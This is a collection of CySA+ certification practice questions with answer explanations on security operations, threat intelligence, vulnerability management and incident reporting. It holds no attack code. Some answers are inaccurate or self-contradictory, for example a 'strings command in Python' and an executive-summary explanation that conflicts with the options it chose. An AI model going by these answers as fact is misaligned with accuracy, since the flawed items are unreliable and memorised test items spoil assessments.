Cysa+ Modules

A security analyst notices anomalous network activity on a system. A user's computer is communicating with a command and control (C2) server. Which of the following concepts are relevant to the security analyst's investigation into the compromised system? (Select the two best options.) A. Beaconing B. Malicious processes C. Malware installation D. Data encryption

A. Beaconing B. Malicious processes A compromised system sends a beacon signal to a C2 server to signal its availability or receive new commands. The security analyst needs to identify the specific malicious processes running on the system to determine the extent of the compromise and the actions the analyst must take to remediate the situation.

Which of the following operations is characteristic of cyber criminal activity? A. Targeting multiple pharmaceutical companies with a financial fraud scheme B. Stealing information about planned U.S. troop deployments C. Releasing embarrassing personal information about the heads of several non-governmental organizations D. Defacing the website of a prominent international oil company

A. Targeting multiple pharmaceutical companies with a financial fraud scheme Organized crime describes a category of malicious activity characterized by the desire to generate illicit profit. Frequently, the activity involves financial fraud and blackmail and normally targets companies and private citizens.

An analyst identifies a script on a compromised workstation. The analyst determines that the author has used meaningful opening and closing tags to identify data types. What scripting language is the analyst examining? A. XML B. HTML C. PowerShell D. OSINT

A. XML eXtensible Markup Language (XML) is a text-based scripting language that transfers data. An important differentiator of XML is that the language does not define the data tags; those are user-defined.

What is the main benefit of using software-defined networking (SDN) in a virtualized environment? A. Increased network security B. Increased ease of management C. Improved network performance D. Reduced hardware costs

B. Increased ease of management SDN allows for increased ease of management in a virtualized environment and separates the control and data planes of traditional network devices enabling the centralization and programmability of network management functions. This centralized approach to network management allows for greater control over network resources and provides a more dynamic and scalable environment.

An organization's network defense team leverages a variety of offensive techniques as defensive measures to stop active attacks while continuing to gain an understanding of adversary behavior. What type of network defense are they engaging in? A. IoCs B. Threat hunting C. Active defense D. Risk management

C. Active defense Active defense describes the adaptation of offensive techniques for network defense purposes. Honeypots are an example of active defense.

A user alerts the incident response team to an email that comes from a domain very similar to the company's legitimate domain. What appears to have been used in this attempted impersonation? A. Reverse shell B. Single pane of glass C. Webhook D. Cousin domain

D. Cousin domain A cousin domain is a domain very similar to a legitimate domain. For example, "example.trainingteam.com" is a cousin domain to "example.com."

The system administrator of a large organization notices abnormal account activity and a high volume of outbound traffic to a suspicious IP address from a client machine. Which of the following best describes the abnormal account activity in this scenario? A. The use of weak passwords and poor authentication mechanisms B. The use of administrator-level accounts C. A user accessing multiple resources in a short period of time D. Unusual user account behavior, such as logging in at unusual times or from unusual locations

D. Unusual user account behavior, such as logging in at unusual times or from unusual locations The abnormal activity may involve changes in login times, accessing files or systems not typically accessed, or altering security settings.

A security analyst notices that the processor consumption on the organization's server is much higher than usual. After investigating, a process named "malware.exe" was found running in the background. Which of the following best describes the relationship between processor consumption and malicious processes in this scenario? A. Malicious processes can cause high processor consumption. B. High processor consumption always indicates the presence of malicious processes. C. Low processor consumption always indicates the absence of malicious processes. D. Malicious processes have no impact on processor consumption.

A. Malicious processes can cause high processor consumption. A system infected with malware may execute malicious processes that can consume a significant amount of processing power. High processor consumption is often an indicator of malicious processes actively running on a system. Therefore, identifying and stopping such processes is crucial to preventing further damage and ensuring the security of the system.

A security organization is concerned about employees connecting rogue equipment to the network. What could they use to identify rogue devices? A. Use a map scan B. Create a honeypot C. Consult paid feeds D. Take memory dumps

A. Use a map scan A map scan, also known as a discovery scan, identifies devices connected to a network. Security organizations frequently use these scans to identify rogue devices.

A security analyst is looking for the appropriate tools to detect and analyze malware in the organization's network. What tools allow the analyst to detect and analyze malware through virtualized environments? (Select the two best options.) A. Cuckoo Sandbox B. Joe Sandbox C. VirusTotal D. Snort

A. Cuckoo Sandbox B. Joe Sandbox Cuckoo Sandbox is a powerful open-source malware analysis system that automatically analyzes and detects malicious files and URLs in a virtualized environment. Joe Sandbox is a commercial malware analysis system that offers advanced malware analysis capabilities such as code analysis, behavior analysis, and memory analysis in a virtualized environment.

Which of the following logging levels is the highest and most verbose level of logging in Windows Event Viewer? A. Debug B. Warning C. Information D. Error

A. Debug Debug is the highest level of logging in Windows Event Viewer, providing the most verbose output for troubleshooting purposes by providing detailed information about a software application or system process.

A threat hunter is searching for malicious activity on a corporate network. Which of the following might they use to guide their efforts? (Select the two best options.) A. Log files B. Memory dumps C. IoCs D. IoAs

C. IoCs D. IoAs Indicators of compromise (IoCs) suggest a compromise may have occurred, such as communications with a malicious domain or IP, suspicious network traffic, or unusual privileged account activity. Identification of an IoC warrants additional investigation. Indicators of attack (IoAs) identify an ongoing attack. These sometimes include specific network traffic, user account creation, and particular log activity.

A security analyst monitoring a network for any irregularities notices a significant increase in beaconing and irregular peer-to-peer communication on one of the company's servers. Which of the following best describes the potential threat of this situation? A. Malware propagation and system compromise B. Data exfiltration and infiltration C. Phishing and spear-phishing attacks D. Privilege escalation and credential theft

A. Malware propagation and system compromise Beaconing is an irregular communication pattern in which a device sends repeated signals or messages to a command and control (C&C) server to establish a connection. Irregular peer-to-peer communication is the communication between two devices that are not typically in direct contact with each other, and it can indicate a lateral movement of malware between endpoints.

Which of the following is a common method for protecting cardholder data and PII? A. Default system configurations B. Encryption technology C. Single-factor authentication D. Data retention policies

B. Encryption technology Encryption technology protects sensitive information such as cardholder data and personally identifiable information (PII). It is crucial to implement appropriate security measures to safeguard sensitive information through data encryption, access control, and security awareness training for employees.

Which of the following is a potential security risk associated with implementing a single sign-on (SSO) solution in a security operations environment? A. Increased complexity of authentication process B. Increased risk of phishing attacks C. Incompatibility with multi-factor authentication (MFA) D. Greater reliance on physical devices for authentication

B. Increased risk of phishing attacks SSO can be convenient for users and help improve productivity, but it can also make it easier for attackers to gain access to multiple systems or applications if they can successfully steal or phish a single set of login credentials.

A security analyst for a corporation notices abnormal OS process behavior and unauthorized changes in the network environment. The analyst reviews the logs and identifies suspicious activities on a server. The analyst could have implemented which security operations practice to prevent the incident from happening in the first place? A. Incident response procedures to quickly detect and respond to security incidents B. Regular vulnerability assessments to identify and remediate vulnerabilities before attackers can exploit them C. User access control policies to limit access to sensitive systems and data D. Regular system backups to quickly restore systems and data in the event of a compromise

B. Regular vulnerability assessments to identify and remediate vulnerabilities before attackers can exploit them The analyst should conduct regular vulnerability assessments to identify and remediate vulnerabilities before attackers can exploit them. When the analyst can identify and remediate vulnerabilities, attackers will have more difficulty exploiting systems and software.

A company's security operations center has implemented a data loss prevention (DLP) solution to monitor and prevent sensitive data from being transmitted outside the organization. The security team also maintains strict controls over cardholder data (CHD) and personally identifiable information (PII) to comply with industry regulations and protect customer privacy. Which of the following is a potential benefit of implementing a DLP solution in a security operations environment? A. A DLP solution can provide physical security for servers and network devices, protecting against theft or damage. B. A DLP solution can automatically detect and remediate vulnerabilities in software and hardware components. C. A DLP solution can help prevent sensitive data from being transmitted outside the organization, reducing the risk of data breaches and compliance violations. D. A DLP solution can provide real-time threat intel

C. A DLP solution can help prevent sensitive data from being transmitted outside the organization, reducing the risk of data breaches and compliance violations. DLP can help identify and prevent unauthorized access, transmission, and storage of sensitive data such as cardholder data and personally identifiable information.

A security analyst analyzes application logs to identify any suspicious activities and notices that one of the company's recently resigned employees had downloaded a large amount of data just before leaving. What is the analyst's most appropriate next step based on the scenario? A. Block the former employee's access to the company's server to prevent further data exfiltration B. Notify the authorities and report the incident to prevent further data theft C. Check the company's firewall logs to identify any external connections made by the former employee D. Review the network's DNS logs to identify any unusual connections to external domains

C. Check the company's firewall logs to identify any external connections made by the former employee Checking the company's firewall logs will help the analyst identify any external connections made by the former employee, which can indicate whether the former employee has shared company data with external parties.

A threat hunter is searching for malicious activity with information derived from the research of a third-party commercial entity. What kind of information is the threat hunter likely using? A. Internal sources B. OSINT C. Paid feed D. ISACs

C. Paid feed A paid feed, also referred to as a commercial feed, is a source of cyber threat intelligence developed using the research and analysis of a private commercial entity.

A security analyst is developing a Python script to analyze regular text from log files. The script will identify potential security incidents and generate alerts for further investigation. Which of the following best describes the security concept the analyst needs to implement in the Python script to detect obfuscated text? (Select the two best options.) A. Polymorphic code B. Cryptography C. Regular expression D. String manipulation

C. Regular expression D. String manipulation The user can utilize regular expressions to detect patterns in text, which can help identify potential security incidents. The user can utilize string manipulation to modify strings, which is helpful in analyzing obfuscated text.

A cybersecurity analyst is investigating a potential phishing attack against one of their clients and finds an email with an attachment and a long string of characters the analyst does not recognize. What is this long string of characters? A. A public key B. A private key C. An encrypted password D. A hash value

D. A hash value Hashing is the process of transforming data into a unique fixed-length string of characters representing the original data to ensure any change to the original data will result in a different hash value, thereby verifying the integrity of the data.

Which of the following provides cybersecurity information and services to the owners and operators of critical infrastructure? A. OSINT B. CSIRT C. Threat hunting D. ISACs

D. ISACs Information Sharing and Analysis Centers (ISACs) provide cybersecurity information and services to the owners and operators of critical infrastructure. They are a forum for exchanging information between the public and private sectors to ensure the protection of vital assets.

A security analyst responsible for carrying out security operations on a company's network has received reports of certain users experiencing issues with their device's slow performance and high memory consumption. Which of the options is a probable cause of the high memory usage and slow performance? A. Running multiple applications at the same time B. Running outdated operating system software C. Having insufficient disk space on the device D. Installing software from unverified sources

D. Installing software from unverified sources Installing software from unverified sources can introduce malware or other harmful programs that consume significant system resources, leading to users experiencing issues with their device's slow performance and high memory consumption.

A company has recently upgraded to the latest version of the web application. During a review of the logs, the security analyst notices an unauthorized change made to the web application by an unknown user. Which of the following logs would most likely provide information about the unauthorized change? A. System log B. Event log C. Application log D. Security log

C. Application log The application log provides information about the application's internal functions and operations, including any unauthorized changes.

What do serverless, cloud, hybrid, and on-premises environments all use in security operations? (Select the three best options.) A. Access control mechanisms B. Security frameworks C. Incident response procedures D. Reduced attack surface

A. Access control mechanisms B. Security frameworks C. Incident response procedures Serverless, cloud, hybrid, and on-premises environments all need access control mechanisms to restrict unauthorized access to any sensitive data or systems. Security frameworks will provide a structured approach to security risk management. Developing incident response procedures is crucial for effectively managing security incidents to minimize damages and potential risks.

A security analyst notices abnormal account activity in the company's system. Someone accessed the system with the CEO's credentials at 2:00 am from a location 500 miles away from the CEO's usual location. The analyst tracks the IP address, GPS address, and device that accessed the system. Which security operation technique did the analyst use to determine the location and device of the user who accessed the system? A. Digital forensics B. Log analysis C. Alert triage D. Threat hunting

A. Digital forensics The security analyst tracked the GPS address, IP address, and device the attacker used to determine their location, which is an example of using digital forensics to investigate the incident.

An organization considers increasing threat intelligence sharing. Which parts of the organization are likely to experience direct benefits from this increased intelligence sharing? (Select the three best options.) A. Incident response B. The general council C. Risk management D. Security engineering

A. Incident response C. Risk management D. Security engineering Incident responders can benefit from the sharing of tactics, techniques, and procedures (TTPs) and can learn valuable lessons from the experiences of other incident response teams. Risk management is a program designed to identify risks and develop strategies to minimize their impact on an organization. Threat intelligence helps organizations make more informed risk decisions. Security engineers can adapt their security solutions to new and innovative TTPs used by malicious actors, increasing their effectiveness against the types of techniques attackers use.

A project manager needs to verify users and authorize access to systems and applications. Which security control should the project manager implement? A. Multi-factor authentication B. Firewall C. Access control list D. Password manager

A. Multi-factor authentication Implementing multi-factor authentication (MFA) is the most appropriate security control to ensure user authentication and authorization for accessing required systems and applications. MFA uses multiple authentication methods such as passwords, biometrics, or token-based authentication to enable only authorized users to access the systems and applications.

An analyst needs to use Nmap to identify workstations with a specific service running on port 8080. What type of script would be best for automating this task? A. Shell script B. XML C. APT D. CSIRT

A. Shell script Shell scripts are best for automating complicated tasks. They easily automate software updates, assist with log review, and run Nmap scans.

A security analyst for a large financial institution investigates a suspicious IP address that their security system flagged. The analyst finds two useful resources, WHOIS and AbuseIPDB. Which of the following best describes the role of WHOIS and AbuseIPDB in security operations? A. WHOIS and AbuseIPDB identify the source of suspicious network traffic. B. WHOIS and AbuseIPDB block malicious traffic from entering a network. C. WHOIS and AbuseIPDB encrypt sensitive data to prevent unauthorized access. D. WHOIS and AbuseIPDB monitor the network for potential vulnerabilities.

A. WHOIS and AbuseIPDB identify the source of suspicious network traffic. WHOIS is a publicly available database that provides information about the owners of registered domain names, IP addresses, and autonomous system numbers. AbuseIPDB is a community-driven project that collects and shares data about IP addresses reported for abusive behavior.

Which of the following is an example of cardholder data (CHD)? A. A customer's name and email address B. A customer's credit card number and expiration date C. A customer's social security number D. A customer's mother's maiden name

B. A customer's credit card number and expiration date Personally identifiable information (PII) related to credit cards or payment cards is cardholder data. It includes sensitive information such as card numbers, expiration dates, and security codes. It is important to ensure that any system that handles cardholder data is secure to prevent data breaches and protect the privacy of customers.

Network defenders realize they are learning valuable information about attackers each time a host is compromised. They want to preserve the ability to gain these insights without risking sensitive information. What tool or technique could the network defenders implement to accomplish this goal? A. Threat hunting B. A honeypot C. A SIEM D. Paid threat feeds

B. A honeypot A honeypot is a fake file, host, or network designed to lure an attacker away from legitimate network assets and information. An organization can steer an attacker toward these fake resources to watch how they operate without exposing valuable resources.

A security analyst at a large financial institution monitors the network for any suspicious activity and finds a log file that appears to have been tampered with. Using the strings command in Python, what will the analyst be able to extract? A. Only strings that are visible to the user B. Both strings and binary data C. Only binary data D. Only numerical data

B. Both strings and binary data The strings command in Python extracts human-readable strings from binary data to obtain text from executable files and extracts data from log files.

A threat-hunting team is looking for unusual traffic and anomalous attempts to access the company's essential servers, databases, and applications. This is an example of what focus area? A. Misconfiguration hunting B. Business-critical asset hunting C. Isolated network hunting D. Indicators of compromise hunting

B. Business-critical asset hunting Business-critical asset hunting is when an organization identifies its business-critical systems and conducts a threat hunt designed to uncover unusual traffic and anomalous attempts to access those systems.

A security analyst discovers that an attacker is attempting to launch a distributed denial-of-service (DDoS) attack on the company's network. What action should the security analyst take to prevent the DDoS attack from succeeding? A. Implement a firewall to block traffic from the attacker's IP address B. Configure the router to limit the amount of traffic coming from the attacker's IP address C. Add more bandwidth to the server to handle the increased traffic D. Shut down the server until the attacker is identified

B. Configure the router to limit the amount of traffic coming from the attacker's IP address The security analyst should configure the router to limit the amount of traffic coming from the attacker's IP address. This will prevent the attacker from overwhelming the company's server with traffic.

A cybersecurity analyst develops a new security protocol that utilizes hashing and headers to enhance the security of the company's data transmissions. Which of the following correctly explains the role of hashing and headers in enhancing security operations? A. Hashing and headers encrypt data transmissions. B. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. C. Hashing and headers decrypt data transmissions. D. Hashing and headers are not related to enhancing security operations; they only format and organize data.

B. Hashing generates unique digital representations of data, while headers add metadata to a message or data packet. Hashing generates a unique digital representation of fixed-length and irreversible data. Headers are pieces of metadata added to a message or data packet that include information such as sender and recipient information, data type, and various other parameters that help to route and manage the transmission of data.

During a log review, an incident responder discovers that a network administrator sent a sensitive file containing company financial data to their personal email account on the same day they resigned. This is likely an example of what? A. Unintentional insider B. Intentional insider C. Script kiddie D. OSINT collection

B. Intentional insider An intentional insider is a trusted individual who knowingly and intentionally conducts or facilitates malicious activity against an organization.

Which of the following options describe the benefits of reducing the attack surface and limiting access to sensitive resources? (Select the two best options.) A. It allows for greater transparency in network operations. B. It enhances the ability to detect and respond to anomalous activity. C. It helps to reduce the risk of unauthorized access to sensitive data. D. It promotes an increase in the availability of resources.

B. It enhances the ability to detect and respond to anomalous activity. C. It helps to reduce the risk of unauthorized access to sensitive data. Limiting access allows for more effective monitoring of network traffic, enhancing the ability to detect and respond to anomalous activity. Reducing the attack surface and limiting access to sensitive resources provide significant benefits to network security, such as reducing the risk of unauthorized access to sensitive data.

While looking into malware discovered on several workstations, an incident responder realizes it all came from new USB drives the company had recently procured. This could be an example of what type of attack? A. Data enrichment B. Supply chain C. Cousin domain D. Active defense

B. Supply chain Supply chain attacks involve identifying vendors and suppliers and leveraging them to gain access to an organization. Embedding malware into hardware or software an organization uses is an example of a supply chain attack.

A cybersecurity analyst investigates a suspicious process running on a server. The analyst discovers unexpected output and registry anomalies. Which of the following are true regarding unexpected output and registry anomalies during security operations? (Select the two best options.) A. Unexpected output can be a result of incorrect command syntax. B. Unexpected output can indicate malware activity. C. Registry anomalies can be caused by legitimate software updates. D. Registry anomalies always indicate a security breach.

B. Unexpected output can indicate malware activity. C. Registry anomalies can be caused by legitimate software updates. Malware often tries to conceal its presence on a system by modifying the system's behavior, which can result in unexpected output. Some software installs or updates may modify the Windows registry to change settings or add new ones, causing registry anomalies.

A medium-sized business collects and analyzes all security-related logs from various sources, including web servers and payment processing systems, to detect and respond to security incidents in real time. By implementing centralized logging, the organization hopes to enhance its ability to prevent and mitigate cyber-attacks, as well as comply with regulatory requirements. Which of the following statements accurately describe the role of centralized logging in cyber security operations? A. Centralized logging provides a way for attackers to bypass security measures and access sensitive information. B. Centralized logging makes it difficult for security personnel to monitor system activity. C. Centralized logging allows security personnel to track and analyze system activity, detect potential security incidents, and respond quickly to threats. D. Centralized logging only benefits large organizations with complex

C. Centralized logging allows security personnel to track and analyze system activity, detect potential security incidents, and respond quickly to threats. Centralized logging is a critical component of a comprehensive cyber security strategy. Consolidating log data from multiple sources, such as servers, firewalls, and network devices, enables security personnel to quickly identify and investigate potential security incidents, as well as monitor system activity in real time.

An analyst is reviewing alerts in the security information and events manager (SIEM). Which of the following might lead them to suspect there has been malicious activity? A. Data enrichment B. APIs C. Reverse shell D. Active defense

C. Reverse shell A reverse shell causes a victim system to initiate a shell session with the attacker's host. Reverse shell activity is unlikely to be legitimate, and the analyst should always investigate.

A threat actor stole 1,000 credit card numbers from an online retailer. Where might the actor try to sell these records? A. CSIRT B. ISACs C. The deep/dark web D. OSINT

C. The deep/dark web The deep/dark web provides cybercriminals and other malicious actors a platform to conduct illicit activity like planning upcoming attacks, exchanging information, and selling stolen goods.

A security analyst at a financial institution plans to use PowerShell and XML to secure an organization's servers. What is the primary purpose of using XML in this context, and how can PowerShell help in securing the servers? A. XML encrypts sensitive data on the servers, while PowerShell automates security-related tasks on the servers. B. XML detects security threats on the servers, while PowerShell monitors server logs for suspicious activity. C. XML provides a common format for exchanging data between systems, while PowerShell helps automate server hardening and configuration tasks. D. XML manages server configurations, while PowerShell authenticates users who access the servers.

C. XML provides a common format for exchanging data between systems, while PowerShell helps automate server hardening and configuration tasks. Extensible Markup Language (XML) describes, stores, and transmits data. PowerShell is a scripting language that automates server hardening and configuration tasks such as managing user accounts, configuring firewalls, and performing system maintenance tasks.

Which of the following is a reason why time synchronization is important in security operations? A. To maintain system performance B. To prevent unauthorized access to sensitive data C. To improve network throughput D. To ensure accurate timestamps on security-related events

D. To ensure accurate timestamps on security-related events Accurate timestamps are critical for forensic analysis of security events and correlating events across systems.

A security analyst working for a financial institution notices abnormal behavior in a workstation's operating system (OS) and identifies multiple unauthorized scheduled tasks and file system anomalies on the affected workstation. Which of the following options is the most likely explanation for these issues? A. The operating system of the workstation is outdated, and the security patches have not been applied, leading to system vulnerabilities that have been exploited. B. An insider threat with access to the workstation is intentionally creating these abnormalities to sabotage the company's security posture. C. The security analyst is experiencing false positives from their security tools, and there are no actual anomalies present. D. A virus has infected the workstation, allowing remote attackers to execute arbitrary code and run malicious tasks.

D. A virus has infected the workstation, allowing remote attackers to execute arbitrary code and run malicious tasks. The abnormal OS process behavior, file system anomalies, and unauthorized scheduled tasks on the workstation could be a sign of a virus infection allowing remote attackers to execute arbitrary code and run malicious tasks, leading to system vulnerabilities.

A security analyst needs to select an appropriate tool to detect and analyze malware in an organization's network. The analyst needs to decide which tool is best for detecting and analyzing malware through virtualized environments. Which of the following tools can be used to detect and analyze malware through virtualized environments? A. Wireshark B. Snort C. Malwarebytes D. Cuckoo Sandbox

D. Cuckoo Sandbox Cuckoo Sandbox specifically detects and analyzes malware in a safe and isolated environment. Cuckoo Sandbox is an open-source software for automating malware analysis in a virtualized environment.

An organization has chosen to automatically ingest indicators. This action is most likely intended to ensure what desired threat intelligence attribute? A. Relevancy B. Accuracy C. APT D. Timeliness

D. Timeliness Timeliness is the speed at which the system collects and disseminates threat intelligence. Information rapidly disseminated is timely. This helps ensure it is up-to-date and remains maximally useful.

A company has recently experienced a data breach, and the security team needs to report the incident to upper management. What are the primary purposes of the executive summary of the report? (Select the three best options.) A. A description of the impact on customers and partners B. A timeline of the incident C. Recommendations for improving cybersecurity D. Technical details about the attack

A. A description of the impact on customers and partners B. A timeline of the incident C. Recommendations for improving cybersecurity The executive summary for external stakeholders should focus on the impact of the incident on them rather than technical details or recommendations. It will help build trust and maintain relationships with customers and partners. The executive summary includes a timeline of the incident; it also has its own section in the incident report. The executive summary may include recommendations for improving cybersecurity; recommendations also have their section in the incident report.

An organization has just experienced a major cyberattack, and the incident response team needs to report the incident to external stakeholders, including customers. What should be in the executive summary of the report? A. A description of the impact on customers and partners B. A timeline of the incident C. Technical details about the attack D. Recommendations for improving cybersecurity

A. A description of the impact on customers and partners The executive summary for external stakeholders should focus on the impact of the incident on them rather than technical details or recommendations. It will help build trust and maintain relationships with customers and partners.

Which of the following scenarios is the most accurate example of a stack overflow? A. A program attempts to write data beyond the end of a fixed-size buffer. B. A program allocates memory to a dynamic buffer without proper bounds checking, leading to a buffer overflow. C. A program fails to check the return value of a function that could fail, leading to unpredictable behavior. D. A program fails to sanitize user input, leading to a SQL injection attack.

A. A program attempts to write data beyond the end of a fixed-size buffer. Stack overflow is a software vulnerability that occurs when a program tries to store more data in the stack than it can handle. The stack has a fixed size and manages data within the program's memory.

An HVAC company's web application allows users to schedule appointments with their HVAC technicians. The application runs on outdated software and represents a security risk, but the software is also critical for the company's operations. The company decides not to upgrade the application and keep it as-is for business reasons. What kind of risk response does this represent? A. Acceptance B. Transference C. Avoidance D. Mitigation

A. Acceptance Risk acceptance refers to operating without change after evaluating an identified risk item. The risk item could be in the form of software, hardware, or existing processes. It is important to consider that there is risk in everything; even simple tasks in day-to-day life involve risks.

A managed security service provider (MSSP) is deploying a sensor on a new client's network. The service level objectives (SLOs) discussed between the two parties would need to perform vulnerability scans that perform enumerating services and banner grabbing. These services directly interact with the devices/software to identify vulnerabilities. Which method of vulnerability scanning would BEST meet the goals arranged in the SLOs? A. Active B. Passive C. Agent D. Agentless

A. Active Active scanning includes using a vulnerability scanner, enumerating services, performing banner grabbing, content enumeration, or using a web application scanner such as Burp Suite or Open Web Application Security Project (OWASP) Zed Attack Proxy (ZAP).

A company has conducted a vulnerability assessment and identified multiple vulnerabilities in its system. However, the IT team has limited resources and cannot address all vulnerabilities at once. What is the most appropriate step for the company to take in this situation? (Select the three best options.) A. Address the most severe vulnerabilities first B. Mitigate vulnerabilities as rapidly as possible, before a threat actor can exploit them C. Mitigate the vulnerabilities in order of the number of affected hosts by a potential breach D. Mitigate the vulnerabilities, which provides opportunities to replace primary controls with compensating controls first

A. Address the most severe vulnerabilities first B. Mitigate vulnerabilities as rapidly as possible, before a threat actor can exploit them C. Mitigate the vulnerabilities in order of the number of affected hosts by a potential breach Risk prioritization, addressing the most severe vulnerabilities first, is a best practice for reacting to the findings of a vulnerability assessment. Mitigating vulnerabilities as rapidly as possible will help the team prevent exploitation by threat actors. Mitigating the vulnerabilities in order of the number of affected hosts by a potential breach helps prioritize vulnerabilities. Do consider that some vulnerabilities may affect many hosts but only result in minor damages.

The company has contracted a managed security service provider (MSSP) to implement new vulnerability scanning methods across the company's endpoints. The reason for needing additional security efforts is due to testing, maintenance, deployment, and protection of the new attack vectors that this method has associated with it. Which vulnerability scanning method is the company in the process of incorporating? A. Agent B. Agentless C. Active D. Passive

A. Agent Agent-based scans require the installation of software utilities to collect information from the endpoint and pass it to the vulnerability scanner.

The security team at a large organization wants to improve its incident response process by analyzing the patterns and behaviors of threat actors. Based on the collected data, they are also looking for ways to adapt their defenses and response strategies. What should the team focus on to continuously improve their incident response capabilities? A. Analyze threat intelligence and adapt strategies B. Implement stronger authentication mechanisms C. Regularly update firewall rules D. Deploy additional security tools

A. Analyze threat intelligence and adapt strategies The team can continuously improve its incident response capabilities by analyzing threat intelligence and adapting strategies based on the patterns and behaviors of threat actors. This approach aligns with the principles of the MITRE ATT&CK framework and the Diamond Model of Intrusion Analysis.

A company's website is vulnerable to several attack vectors. The company has hired a red team to identify these vulnerabilities and exploit them to gain access to the company's systems. What is the best way to mitigate the risk of these attacks? A. Attack surface reduction B. Security control testing C. Penetration testing and adversary emulation D. Bug bounty

A. Attack surface reduction Attack surface reduction reduces all potential pathways a threat actor could use to gain unauthorized access or control. Reducing attack vectors will increase the cybersecurity posture of the organization.

A cyber security analyst is reviewing a vulnerability assessment report. The analyst focuses on the weaponization metrics considering the ease with which an attacker can produce a usable exploit. The analyst will pay close attention to which exploitability metrics? (Select the three best options.) A. Attack vectors B. Attack complexity C. User interaction D. Exploit code maturity

A. Attack vectors B. Attack complexity C. User interaction Exploitability is the ease and likelihood of exploiting a vulnerability that involves an attack vector, attack complexity, privileges required, and user interaction. An attack vector is an indicator of the level of area/access for an attacker to exploit a vulnerability. Attack complexity refers to the availability of tools and techniques required to exploit a vulnerability. User interaction (UI) refers to exploiting the vulnerability depending on some local user action, such as executing a file attachment.

A SOC manager identifies frequent human errors when analysts perform a specific repeatable human process. What is an effective way to eliminate these errors? (Select the two best options.) A. Automating the task B. Implementing webhooks C. Implementing a single pane of glass D. Purchasing plugins

A. Automating the task B. Implementing webhooks Automating processes removes human interaction. Operator fatigue can sometimes result in human error. Webhooks are a kind of automation in which an application sends automated messages. The messages are sent to a unique URL and include relevant information like data about the event and the time it occurred.

Which of the following sources are potential sources of offensive open-source intelligence (OSINT)? (Select the three best options.) A. Blogs and social media B. HTML code C. Government bulletins D. Metadata

A. Blogs and social media B. HTML code D. Metadata Blogs and social media are potential sources of Open-source intelligence (OSINT). Employee blogs often contain information valuable to an attacker, including pattern of life data, contact information, or details relating to social engineering. A document's metadata may contain hidden information an organization does not intend to reveal, such as the names of its author and editors. HTML code can reveal sensitive information such as internal IP addresses, file paths, the names of sensitive servers, or software versions.

A customer logs into their bank account and simultaneously checks their email. They see an email containing a link that, when clicked, initiates a transfer of funds from the user's bank account to an attacker's account. What type of vulnerability does this situation describe? A. CSRF B. Broken access control C. Injection D. XSS

A. CSRF Cross-site request forgery (CSRF) is a web application vulnerability allowing an attacker to perform actions on behalf of an authenticated user. This attack happens when a victim unknowingly clicks a malicious link or submits a malicious form.

A cybersecurity professional analyzes incident response activities within their organization. When determining the effectiveness of remediation efforts, what should the professional do to measure the impact of a security incident on the organization? A. Calculate the total cost of lost productivity and system downtime B. Assess the reduction in system vulnerabilities after remediation C. Evaluate the effectiveness of the organization's disaster recovery plan D. Monitor the implementation of multi-factor authentication (MFA) across the organization

A. Calculate the total cost of lost productivity and system downtime By calculating the financial costs related to lost productivity and downtime, the professional can measure the impact of a security incident on the organization and the effectiveness of remediation efforts.

When checking the scan output from the Nmap tool, how can an administrator determine the type of applications or services that are using an open port? (Select the two best options.) A. Check service information B. Check port information C. Check state information D. Check workspace snapshot information

A. Check service information B. Check port information The service column of the scan report, located in the command line, will show what type of service is using the port-for example, HTTPS, ldap, or ldapssl. The port information can also determine the type of service using the port in the scan report. Most administrators know the common TCP/IP ports for 443 (HTTPS) or 389 (ldap), for example.

The HTML report from the Prowler assessment tool confirmed that the Amazon Web Services (AWS) account does not currently support the virtual authenticator application on company smartphones for the root account. However, the root account can still access all services. When examining the report, what can a security administrator check to find out more information about this security finding? A. Check status extended column B. Check service name column C. Check severity column D. Check rules column

A. Check status extended column The status extended column provides more information on the security finding. In this case, the description may state, "MFA is not enabled for root account."

When reviewing the issues on the Arachni web user interface (UI), how can a web administrator determine the way in which the system detected a cross-site scripting vulnerability on a targeted site? A. Check the input section B. Check the intruder section C. Check the repeater section D. Check the dispatchers section

A. Check the input section The input section of the issues reported in the Arachni web UI can show that an input field with an id or username entry can find a cross-site scripting (XSS) vulnerability on the target website.

A security analyst for a large financial institution notices abnormal OS process behavior, unauthorized changes, and file system changes occurring on one of the company's servers. The analyst believes there may be a security breach. What is the best way to confirm the analyst's suspicions of a breach? A. Check the system logs for unusual activity B. Conduct a full system backup to ensure that data is not lost C. Ask all employees who have access to the server if they made any changes D. Shut down the server immediately to prevent further damage

A. Check the system logs for unusual activity System logs record all activity on a server, including processes and file changes, which makes it an excellent resource for detecting security breaches.

A security analyst is working on an incident involving a web application attack. They need to refer to certain industry-standard frameworks to identify the stages of the attack and potential vulnerabilities that the attacker exploited. Which of the following actions should the analyst take to gain insight into the incident? A. Conduct a thorough log analysis B. Perform a risk assessment C. Implement network segmentation D. Enforce strict password policies

A. Conduct a thorough log analysis By conducting a thorough log analysis, the analyst can identify the stages of the attack and potential vulnerabilities exploited, as described in the cyber kill chain and Open Web Application Security Project (OWASP) Testing Guide.

A security analyst at an e-commerce company must understand the outcomes from a recent vulnerability report and develop an action plan to address identified issues. What should be the analyst's primary focus in creating an effective action plan? A. Conducting a root cause analysis of the identified vulnerabilities B. Analyzing lessons learned from previous vulnerability assessments C. Implementing regular security awareness training programs D. Establishing a vulnerability scoring system

A. Conducting a root cause analysis of the identified vulnerabilities Performing a root cause analysis allows the security analyst to understand the underlying causes of the identified vulnerabilities, which is crucial for developing an effective action plan to address and mitigate those issues.

A security operations center (SOC) manager wants to increase the use of automation. What are some things they should consider when trying to prioritize tasks for automation? (Select the three best options.) A. Consider the frequency of a task B. Consider the level of effort required for a task C. Consider what tasks support security in high-risk areas D. Consider the known IoCs

A. Consider the frequency of a task B. Consider the level of effort required for a task C. Consider what tasks support security in high-risk areas The more frequently analysts perform a task, the more likely they are to save significant time by automating it. Tasks that require a great deal of manual effort are good candidates for automation. Tasks important to the security of areas that are at higher risk of attack are good candidates for automation.

A large corporation has suffered a ransomware attack, significantly disrupting its operations and losing critical data. The attacker was able to exploit a known vulnerability in the organization's software that was exposed due to a lack of proper updates. What could have helped prevent this attack? A. Consistently applying patches using proper patch management procedures B. Securely configuring systems in accordance with configuration management procedures C. Implementing service-level objectives (SLOs) to ensure a reduction in breaches D. Providing awareness, education, and training on how to recognize and respond to cyber attacks

A. Consistently applying patches using proper patch management procedures Consistently applying patches using proper patch management procedures would prevent this issue from reoccurring in the future. Security updates prevent threat actors from exploiting vulnerabilities.

